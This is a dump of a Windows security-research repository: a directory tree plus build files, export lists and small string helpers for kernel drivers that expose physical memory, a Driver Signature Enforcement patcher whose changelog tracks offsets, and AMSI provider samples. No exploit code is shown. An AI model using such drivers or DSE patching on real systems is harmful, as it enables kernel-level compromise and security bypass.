├── source
├── WormholeDrivers
│ ├── MAPMEM
│ │ ├── DIRS
│ │ ├── SYS
│ │ │ ├── SOURCES
│ │ │ ├── MAPMEM.INI
│ │ │ ├── MAKEFILE
│ │ │ └── MAPMEM.H
│ │ ├── EXE
│ │ │ ├── SOURCES
│ │ │ ├── MAKEFILE
│ │ │ └── MAPTEST.MAK
│ │ └── README.TXT
│ ├── PHYMEM
│ │ ├── LICENSE
│ │ ├── LICENSE.html
│ │ ├── PCIFlt
│ │ │ ├── DebugPrint.c
│ │ │ ├── DebugPrint.h
│ │ │ ├── Release
│ │ │ │ ├── PCIFlt.sys
│ │ │ │ └── PCIFilter.inf
│ │ │ ├── PCIFlt.dsw
│ │ │ └── PCIFilter.h
│ │ └── PhyMem
│ │ │ ├── test
│ │ │ ├── pmdll.lib
│ │ │ ├── test.dsw
│ │ │ ├── test.cpp
│ │ │ └── pmdll.h
│ │ │ ├── driver
│ │ │ ├── DebugPrint.c
│ │ │ ├── DebugPrint.h
│ │ │ ├── phymem.dsw
│ │ │ ├── phymem.h
│ │ │ └── AccessBus.c
│ │ │ └── pmdll
│ │ │ ├── Release
│ │ │ └── pmdll.lib
│ │ │ ├── pmdll.dsw
│ │ │ ├── pmdll.h
│ │ │ └── phymem.h
│ ├── WINRING0
│ │ ├── dll
│ │ │ ├── OlsDll.rc
│ │ │ ├── sys
│ │ │ │ ├── SOURCES
│ │ │ │ ├── MAKEFILE
│ │ │ │ └── OpenLibSys.rc
│ │ │ ├── vxd
│ │ │ │ ├── OpenLS.def
│ │ │ │ ├── OpenLS.rc
│ │ │ │ ├── ctrl.asm
│ │ │ │ └── Makefile
│ │ │ ├── stdafx.cpp
│ │ │ ├── resource.h
│ │ │ ├── Driver.h
│ │ │ ├── stdafx.h
│ │ │ ├── OlsApi.def
│ │ │ ├── OlsDll.h
│ │ │ └── OlsDef.h
│ │ └── README.md
│ ├── WINIO
│ │ ├── Source
│ │ │ ├── Dll
│ │ │ │ ├── WinIo.aps
│ │ │ │ ├── WinIo.rc
│ │ │ │ ├── WinIo.suo
│ │ │ │ ├── Phys32.h
│ │ │ │ ├── WinIo.def
│ │ │ │ ├── resource.h
│ │ │ │ ├── Port32.h
│ │ │ │ ├── winio.h
│ │ │ │ ├── WinIo.sln
│ │ │ │ └── Phys32.cpp
│ │ │ └── Drv
│ │ │ │ ├── SOURCES
│ │ │ │ ├── MAKEFILE
│ │ │ │ └── winio_nt.h
│ │ ├── Samples
│ │ │ ├── DumpPhys
│ │ │ │ ├── DumpPhys.suo
│ │ │ │ ├── DumpPhys
│ │ │ │ │ ├── Properties
│ │ │ │ │ │ ├── Settings.settings
│ │ │ │ │ │ ├── Settings.Designer.cs
│ │ │ │ │ │ └── AssemblyInfo.cs
│ │ │ │ │ ├── DumpPhys.manifest
│ │ │ │ │ └── Program.cs
│ │ │ │ └── DumpPhys.sln
│ │ │ └── DumpPort
│ │ │ │ ├── DumpPort.suo
│ │ │ │ ├── DumpPort
│ │ │ │ ├── Properties
│ │ │ │ │ ├── Settings.settings
│ │ │ │ │ ├── Settings.Designer.cs
│ │ │ │ │ └── AssemblyInfo.cs
│ │ │ │ ├── DumpPort.manifest
│ │ │ │ └── Program.cs
│ │ │ │ └── DumpPort.sln
│ │ └── .gitignore
│ ├── INPOUT
│ │ ├── MAKEFILE
│ │ ├── SOURCES
│ │ ├── HWInterfaceDrv.sln
│ │ ├── hwinterfacedrv.rc
│ │ ├── hwinterfacedrv.h
│ │ ├── ReadMe.txt
│ │ └── license.txt
│ └── readme.txt
├── AMSI
│ ├── AmsiProviderATL
│ │ ├── AmsiServer
│ │ │ ├── AmsiScan
│ │ │ │ ├── AmsiScan.rgs
│ │ │ │ ├── AmsiScan.rc
│ │ │ │ ├── AmsiScanps.def
│ │ │ │ ├── AmsiScan.vcxproj.user
│ │ │ │ ├── stdafx.cpp
│ │ │ │ ├── AmsiScan.def
│ │ │ │ ├── targetver.h
│ │ │ │ ├── dllmain.h
│ │ │ │ ├── dllmain.cpp
│ │ │ │ ├── AmsiProvider.rgs
│ │ │ │ ├── resource.h
│ │ │ │ ├── stdafx.h
│ │ │ │ ├── AmsiScan.idl
│ │ │ │ ├── dlldata.c
│ │ │ │ ├── AmsiScan.cpp
│ │ │ │ ├── AmsiProvider.h
│ │ │ │ ├── AmsiScan_i.c
│ │ │ │ └── AmsiScan.vcxproj.filters
│ │ │ └── AmsiScanPS
│ │ │ │ ├── AmsiScanPS.vcxproj.user
│ │ │ │ └── AmsiScanPS.vcxproj.filters
│ │ ├── AmsiClient
│ │ │ ├── AmsiClient.vcxproj.user
│ │ │ ├── pch.cpp
│ │ │ ├── pch.h
│ │ │ ├── AmsiClient.vcxproj.filters
│ │ │ └── AmsiClient.cpp
│ │ └── AmsiScan.sln
│ └── AmsiProviderC
│ │ ├── AmsiProviderServer
│ │ ├── exports.def
│ │ ├── AmsiProviderServer.vcxproj.user
│ │ ├── minirtl
│ │ │ ├── _strend.c
│ │ │ ├── _strlen.c
│ │ │ ├── _strcat.c
│ │ │ ├── _strcpy.c
│ │ │ ├── ultohex.c
│ │ │ ├── u64tohex.c
│ │ │ └── rtltypes.h
│ │ ├── global.h
│ │ ├── classfactory.h
│ │ └── AmsiProviderServer.vcxproj.filters
│ │ └── AmsiProviderServer.sln
├── DrvTools
│ ├── readme.txt
│ └── src
│ │ ├── DrvTools.ico
│ │ ├── DrvTools.res
│ │ ├── rsrc
│ │ ├── main.ico
│ │ └── about64.ico
│ │ ├── DrvTools.lpr
│ │ └── ppas.bat
├── IntelNal
│ ├── README.md
│ ├── Kconfig
│ ├── Makefile
│ ├── src
│ │ ├── iqvlinux.spec
│ │ └── nalinstall
│ └── inc
│ │ └── linux
│ │ └── linuxdriverdevice_i.h
├── ApiSetSchema
│ ├── Resource.rc
│ ├── icon_gears.ico
│ ├── ApiSetSchemaView.vcxproj.user
│ ├── minirtl
│ │ ├── _strend.c
│ │ ├── _strlen.c
│ │ ├── _strcat.c
│ │ ├── _strcpy.c
│ │ ├── ultostr.c
│ │ ├── _strcmpi.c
│ │ ├── _strncpy.c
│ │ ├── rtltypes.h
│ │ ├── _strncmpi.c
│ │ └── _strstr.c
│ ├── resource.h
│ ├── ApiSetSchemaView.sln
│ └── 1.manifest
├── ROS
│ ├── win32u
│ │ ├── win32u
│ │ │ ├── ver.rc
│ │ │ ├── win32u.vcxproj.user
│ │ │ ├── resource.h
│ │ │ ├── win32u.vcxproj.filters
│ │ │ ├── main.c
│ │ │ ├── w32parguments.h
│ │ │ └── w32parguments_checked.h
│ │ └── win32u.sln
│ └── srvany2
│ │ ├── srvany2
│ │ ├── minirtl
│ │ │ ├── _strlen.c
│ │ │ ├── _strcat.c
│ │ │ ├── _strcpy.c
│ │ │ ├── cmdline.h
│ │ │ └── rtltypes.h
│ │ ├── srvany2.vcxproj.user
│ │ └── srvany2.vcxproj.filters
│ │ └── srvany2.sln
├── DSEPatch
│ ├── DSEPatch
│ │ ├── resource.rc
│ │ ├── minirtl
│ │ │ ├── _strend.c
│ │ │ ├── _strlen.c
│ │ │ ├── _strcat.c
│ │ │ ├── _strcpy.c
│ │ │ ├── ultohex.c
│ │ │ ├── ultostr.c
│ │ │ ├── _strcmp.c
│ │ │ ├── u64tohex.c
│ │ │ ├── u64tostr.c
│ │ │ ├── _strcmpi.c
│ │ │ ├── _strncpy.c
│ │ │ ├── cmdline.h
│ │ │ ├── _strncmp.c
│ │ │ ├── rtltypes.h
│ │ │ └── _strncmpi.c
│ │ ├── resource.h
│ │ ├── DSEPatch.vcxproj.user
│ │ ├── cui
│ │ │ └── cui.h
│ │ ├── instdrv.h
│ │ ├── global.h
│ │ ├── se_patterns.h
│ │ ├── hde
│ │ │ └── pstdint.h
│ │ └── sup.h
│ ├── changelog.txt
│ ├── DSEPatch.sln
│ └── README.md
├── wdextract
│ ├── wdextract
│ │ ├── zlibwapi.lib
│ │ ├── pch.cpp
│ │ ├── pch.h
│ │ ├── wdextract.vcxproj.user
│ │ └── wdextract.vcxproj.filters
│ ├── README.md
│ └── wdextract.sln
├── StripDebug
│ ├── minirtl
│ │ ├── _strlen.c
│ │ ├── _strcat.c
│ │ ├── _strcpy.c
│ │ ├── cmdline.h
│ │ └── rtltypes.h
│ ├── StripDebug.vcxproj.user
│ ├── StripDebug.sln
│ ├── global.h
│ ├── cui.h
│ └── StripDebug.vcxproj.filters
├── NtCall64_LogParser
│ ├── NtCall64_LogParser.vcxproj.user
│ ├── NtCall64_LogParser.vcxproj.filters
│ ├── NtCall64_LogParser.sln
│ └── NtCall64_LogParser.cpp
└── SecTrash
│ ├── readme.txt
│ ├── maxproc64.c
│ ├── secureaplus.c
│ ├── superantispyware.c
│ ├── asusgio2.c
│ └── iobitcallbacks.c
├── LICENSE
└── README.md
/source/WormholeDrivers/MAPMEM/DIRS:
--------------------------------------------------------------------------------
1 | DIRS=exe \
2 | sys
3 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rgs:
--------------------------------------------------------------------------------
1 | HKCR
2 | {
3 | }
4 |
--------------------------------------------------------------------------------
/source/DrvTools/readme.txt:
--------------------------------------------------------------------------------
1 | DrvTools 1.0.2303
2 | Build with Lazarus FPC v3.2.2
3 |
--------------------------------------------------------------------------------
/source/IntelNal/README.md:
--------------------------------------------------------------------------------
1 | Intel QV Linux kernel driver, see COPYING for more info
2 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/Resource.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/ApiSetSchema/Resource.rc
--------------------------------------------------------------------------------
/source/DrvTools/src/DrvTools.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DrvTools/src/DrvTools.ico
--------------------------------------------------------------------------------
/source/DrvTools/src/DrvTools.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DrvTools/src/DrvTools.res
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/ver.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/ROS/win32u/win32u/ver.rc
--------------------------------------------------------------------------------
/source/ApiSetSchema/icon_gears.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/ApiSetSchema/icon_gears.ico
--------------------------------------------------------------------------------
/source/DrvTools/src/rsrc/main.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DrvTools/src/rsrc/main.ico
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/resource.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DSEPatch/DSEPatch/resource.rc
--------------------------------------------------------------------------------
/source/DrvTools/src/rsrc/about64.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DrvTools/src/rsrc/about64.ico
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/LICENSE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/LICENSE
--------------------------------------------------------------------------------
/source/wdextract/wdextract/zlibwapi.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/wdextract/wdextract/zlibwapi.lib
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/LICENSE.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/LICENSE.html
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/SYS/SOURCES:
--------------------------------------------------------------------------------
1 | TARGETNAME=mapmem
2 | TARGETPATH=$(BASEDIR)\lib
3 | TARGETTYPE=DRIVER
4 |
5 | SOURCES=mapmem.c
6 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/OlsDll.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINRING0/dll/OlsDll.rc
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.c
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.h
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Source/Dll/WinIo.aps
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Source/Dll/WinIo.rc
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Source/Dll/WinIo.suo
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.lib
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Drv/SOURCES:
--------------------------------------------------------------------------------
1 | TARGETNAME=WinIo
2 | TARGETPATH=.
3 | TARGETTYPE=DRIVER
4 | NTDEBUG=ntsd
5 |
6 | SOURCES= winio.c
7 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFlt.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFlt.sys
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.c
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.h
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rc
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFilter.inf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFilter.inf
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.suo
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.suo
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/Release/pmdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/Release/pmdll.lib
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/sys/SOURCES:
--------------------------------------------------------------------------------
1 | TARGETNAME=WinRing0
2 | TARGETPATH=lib
3 | TARGETTYPE=DRIVER
4 |
5 | INCLUDES=..\
6 |
7 | SOURCES=OpenLibSys.c OpenLibSys.rc
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/Phys32.h:
--------------------------------------------------------------------------------
1 | #ifndef PHYS32_H
2 | #define PHYS32_H
3 |
4 | extern DWORD (WINAPI *VxDCall)(DWORD Service, DWORD EAX_Reg, DWORD ECX_Reg);
5 |
6 | #endif
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/win32u.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/exports.def:
--------------------------------------------------------------------------------
1 |
2 | LIBRARY
3 |
4 | EXPORTS
5 | DllGetClassObject PRIVATE
6 | DllCanUnloadNow PRIVATE
7 | DllRegisterServer PRIVATE
8 | DllUnregisterServer PRIVATE
9 |
--------------------------------------------------------------------------------
/source/IntelNal/Kconfig:
--------------------------------------------------------------------------------
1 | config INTEL_IQVANDROID
2 | tristate "iqvandroid kernel driver for BYT MFG tools"
3 | default n
4 | help
5 | Select this module for support BYT MFG tools.
6 |
7 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScanps.def:
--------------------------------------------------------------------------------
1 |
2 | LIBRARY
3 |
4 | EXPORTS
5 | DllGetClassObject PRIVATE
6 | DllCanUnloadNow PRIVATE
7 | DllRegisterServer PRIVATE
8 | DllUnregisterServer PRIVATE
9 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScanPS/AmsiScanPS.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/AmsiProviderServer.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/EXE/SOURCES:
--------------------------------------------------------------------------------
1 |
2 | TARGETNAME=maptest
3 | TARGETPATH=$(BASEDIR)\lib
4 | TARGETTYPE=PROGRAM
5 |
6 | INCLUDES=..\sys;$(BASEDIR)\src\video\inc
7 |
8 | SOURCES=maptest.c
9 |
10 | UMTYPE=console
11 | UMBASE=0x100000
12 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/SYS/MAPMEM.INI:
--------------------------------------------------------------------------------
1 | \registry\machine\system\currentcontrolset\services\MapMem
2 | Type = REG_DWORD 0x00000001
3 | Start = REG_DWORD 0x00000003
4 | Group = Extended base
5 | ErrorControl = REG_DWORD 0x00000001
6 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 | InitializeWinIo
3 | ShutdownWinIo
4 | MapPhysToLin
5 | UnmapPhysicalMemory
6 | GetPhysLong
7 | SetPhysLong
8 | GetPortVal
9 | SetPortVal
10 | InstallWinIoDriver
11 | RemoveWinIoDriver
12 |
--------------------------------------------------------------------------------
/source/wdextract/wdextract/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed
2 |
3 | #include "pch.h"
4 |
5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers.
6 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/vxd/OpenLS.def:
--------------------------------------------------------------------------------
1 | VXD OPENLS DYNAMIC
2 |
3 | DESCRIPTION 'OPENLS VXD'
4 |
5 | SEGMENTS
6 | _LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
7 | _LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
8 | EXPORTS
9 | OPENLS_DDB @1
10 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed
2 |
3 | #include "pch.h"
4 |
5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers.
6 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // AmsiScan.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/ApiSetSchemaView.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | false
5 |
6 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.def:
--------------------------------------------------------------------------------
1 | ; AmsiScan.def : Declares the module parameters.
2 |
3 | LIBRARY
4 |
5 | EXPORTS
6 | DllCanUnloadNow PRIVATE
7 | DllGetClassObject PRIVATE
8 | DllRegisterServer PRIVATE
9 | DllUnregisterServer PRIVATE
10 | DllInstall PRIVATE
11 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/EXE/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/SYS/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Drv/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/sys/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/source/DSEPatch/changelog.txt:
--------------------------------------------------------------------------------
1 | 1.0.1 02 Aug 2016
2 | Initial release
3 |
4 | 1.0.2 14 Apr 2017
5 | Added offsets for RS2, rtls update
6 |
7 | 1.0.3 11 Oct 2017
8 | Added offsets for RS3
9 |
10 | 1.0.4 01 May 2018
11 | Added offset for RS4
12 |
13 | 1.0.5 22 Jan 2019
14 | Added offset for RS5, reacreated in vs17 and did rearrage, rtls update, make it public
15 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/EXE/MAPTEST.MAK:
--------------------------------------------------------------------------------
1 | # Nmake macros for building Windows 32-Bit apps
2 |
3 | !include
4 |
5 | all: maptest.exe
6 |
7 | maptest.obj: maptest.c
8 | $(cc) $(cflags) $(cvars) $(cdebug) -I..\sys maptest.c
9 |
10 | maptest.exe: maptest.obj
11 | $(link) $(linkdebug) $(conflags) -out:maptest.exe maptest.obj $(conlibs)
12 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/README.md:
--------------------------------------------------------------------------------
1 | # WinRing0
2 | Windows Ring0 Access
3 |
4 | ###File Directory
5 |
6 | >dll
7 | * driver source
8 |
9 | >drv
10 | * driver normal interface
11 |
12 | ##Description
13 | Allow user application to access ring0 level resource
14 |
15 | * access cpu msr register
16 | * read/write memory directly
17 | * io pci device
18 | * etc...
19 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strend.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strend_a(const char *s)
4 | {
5 | if ( s==0 )
6 | return 0;
7 |
8 | while ( *s!=0 )
9 | s++;
10 |
11 | return (char *)s;
12 | }
13 |
14 | wchar_t *_strend_w(const wchar_t *s)
15 | {
16 | if ( s==0 )
17 | return 0;
18 |
19 | while ( *s!=0 )
20 | s++;
21 |
22 | return (wchar_t *)s;
23 | }
24 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strend.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strend_a(const char *s)
4 | {
5 | if ( s==0 )
6 | return 0;
7 |
8 | while ( *s!=0 )
9 | s++;
10 |
11 | return (char *)s;
12 | }
13 |
14 | wchar_t *_strend_w(const wchar_t *s)
15 | {
16 | if ( s==0 )
17 | return 0;
18 |
19 | while ( *s!=0 )
20 | s++;
21 |
22 | return (wchar_t *)s;
23 | }
24 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dllmain.h:
--------------------------------------------------------------------------------
1 | // dllmain.h : Declaration of module class.
2 |
3 | class CAmsiScanModule : public ATL::CAtlDllModuleT< CAmsiScanModule >
4 | {
5 | public :
6 | DECLARE_LIBID(LIBID_AmsiScanLib)
7 | DECLARE_REGISTRY_APPID_RESOURCEID(IDR_AMSISCAN, "{508c88ef-ca97-4107-a022-6025892ef192}")
8 | };
9 |
10 | extern class CAmsiScanModule _AtlModule;
11 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strend.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strend_a(const char *s)
4 | {
5 | if ( s==0 )
6 | return 0;
7 |
8 | while ( *s!=0 )
9 | s++;
10 |
11 | return (char *)s;
12 | }
13 |
14 | wchar_t *_strend_w(const wchar_t *s)
15 | {
16 | if ( s==0 )
17 | return 0;
18 |
19 | while ( *s!=0 )
20 | s++;
21 |
22 | return (wchar_t *)s;
23 | }
24 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t _strlen_a(const char *s)
4 | {
5 | char *s0 = (char *)s;
6 |
7 | if ( s==0 )
8 | return 0;
9 |
10 | while ( *s!=0 )
11 | s++;
12 |
13 | return (s-s0);
14 | }
15 |
16 | size_t _strlen_w(const wchar_t *s)
17 | {
18 | wchar_t *s0 = (wchar_t *)s;
19 |
20 | if ( s==0 )
21 | return 0;
22 |
23 | while ( *s!=0 )
24 | s++;
25 |
26 | return (s-s0);
27 | }
28 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t _strlen_a(const char *s)
4 | {
5 | char *s0 = (char *)s;
6 |
7 | if ( s==0 )
8 | return 0;
9 |
10 | while ( *s!=0 )
11 | s++;
12 |
13 | return (s-s0);
14 | }
15 |
16 | size_t _strlen_w(const wchar_t *s)
17 | {
18 | wchar_t *s0 = (wchar_t *)s;
19 |
20 | if ( s==0 )
21 | return 0;
22 |
23 | while ( *s!=0 )
24 | s++;
25 |
26 | return (s-s0);
27 | }
28 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t _strlen_a(const char *s)
4 | {
5 | char *s0 = (char *)s;
6 |
7 | if ( s==0 )
8 | return 0;
9 |
10 | while ( *s!=0 )
11 | s++;
12 |
13 | return (s-s0);
14 | }
